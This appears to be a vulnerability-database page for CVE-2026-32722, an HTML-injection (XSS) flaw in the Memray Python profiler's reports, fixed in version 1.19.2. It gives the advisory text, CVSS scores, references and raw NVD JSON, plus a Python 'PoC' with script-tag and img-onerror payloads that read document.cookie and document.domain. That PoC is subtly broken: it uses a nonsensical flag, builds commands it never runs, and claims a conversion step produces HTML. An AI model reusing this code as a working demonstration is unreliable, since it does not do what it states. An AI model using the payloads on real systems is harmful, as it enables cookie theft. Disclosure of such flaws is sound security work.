CVE-2026-32722

Description

Memray is a memory profiler for Python. Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping. Because there was no escaping, attacker-controlled command line arguments were inserted as raw HTML into the generated report. This allowed JavaScript execution when a victim opened the generated report in a browser. Version 1.19.2 fixes the issue.

CVSS Details

CVSS Score

3.6

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bloomberg:memray:*:*:*:*:*:python:*:* - VULNERABLE

Bloomberg Memray < 1.19.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-32722 PoC - Memray HTML Injection leading to XSS
# This PoC demonstrates how attacker-controlled command line arguments
# can inject malicious JavaScript into Memray-generated HTML reports

import subprocess
import os
import time

# Step 1: Create a target Python script
target_script = '''
import sys
import time

# Simulate processing command line arguments
# In real attack, these would contain XSS payloads
for i in range(100):
    time.sleep(0.01)

if __name__ == "__main__":
    print("Processing with args:", sys.argv)
'''

# Step 2: Create the XSS payload
# The payload will be passed as command line argument
xss_payload = "--test=<script>alert(document.cookie)</script>"

# Step 3: Run Memray with the malicious command line argument
# This will generate an HTML report containing the unescaped payload
cmd = [
    "memray",
    "run",
    "-o", "memray_report.bin",
    "--分析方法",
    target_script,
    xss_payload
]

# Alternative: Direct command with XSS in arguments
malicious_cmd = [
    "memray",
    "run",
    "-o", "memray_output.bin",
    "python",
    "-c",
    "import time; [time.sleep(0.01) for _ in range(100)]",
    "--param=<img src=x onerror=alert(document.domain) />"
]

# Step 4: Convert the binary report to HTML
# The resulting HTML will contain the XSS payload unescaped
convert_cmd = ["memray", "tree", "memray_report.bin"]

print("[*] CVE-2026-32722 - Memray XSS via HTML Injection")
print("[*] Payload:", xss_payload)
print("[*] When victim opens the generated HTML report in browser,")
print("[*] the JavaScript will execute automatically.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32722
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32722
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32722/
[4] VulDB https://vuldb.com/cve/CVE-2026-32722
[5] https://github.com/bloomberg/memray/commit/ba6e4e2e9930f9641bed7adfdf43c8e2545ce249
[6] https://github.com/bloomberg/memray/releases/tag/v1.19.2
[7] https://github.com/bloomberg/memray/security/advisories/GHSA-r5pr-887v-m2w9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32722", "sourceIdentifier": "[email protected]", "published": "2026-03-18T22:16:24.670", "lastModified": "2026-03-19T19:21:28.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memray is a memory profiler for Python. Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping. Because there was no escaping, attacker-controlled command line arguments were inserted as raw HTML into the generated report. This allowed JavaScript execution when a victim opened the generated report in a browser. Version 1.19.2 fixes the issue."}, {"lang": "es", "value": "Memray es un perfilador de memoria para Python. Antes de Memray 1.19.2, Memray renderizaba la línea de comandos del proceso rastreado directamente en los informes HTML generados sin escapar. Debido a que no había escape, los argumentos de línea de comandos controlados por el atacante se insertaban como HTML sin procesar en el informe generado. Esto permitía la ejecución de JavaScript cuando una víctima abría el informe generado en un navegador. La versión 1.19.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 3.6, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bloomberg:memray:*:*:*:*:*:python:*:*", "versionEndExcluding": "1.19.2", "matchCriteriaId": "09B42289-015F-4BFB-9F71-1299C86C535D"}]}]}], "references": [{"url": "https://github.com/bloomberg/memray/commit/ba6e4e2e9930f9641bed7adfdf43c8e2545ce249", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/bloomberg/memray/releases/tag/v1.19.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/bloomberg/memray/security/advisories/GHSA-r5pr-887v-m2w9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}